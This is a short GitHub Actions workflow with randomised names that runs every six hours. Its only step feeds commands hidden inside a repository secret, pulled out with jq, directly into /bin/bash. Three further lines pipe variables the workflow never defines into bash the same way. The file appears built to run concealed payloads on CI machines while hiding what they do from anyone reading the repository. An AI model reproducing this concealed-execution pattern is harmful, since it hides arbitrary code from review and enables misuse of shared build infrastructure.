name: brashslovenly
on:
  workflow_dispatch:
  schedule:
    - cron: '11 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brashslovenly
        env:
          wcrzw464: ${{ secrets.wcrzw464 }}
        run: |
          echo $wcrzw464 | jq -r .wc3612 | /bin/bash
          echo $tnuj4645 | jq -r .ls377 | /bin/bash
          echo $o02867 | jq -r .bqo899 | /bin/bash
          echo $nikzn9526 | jq -r .vvu71 | /bin/bash

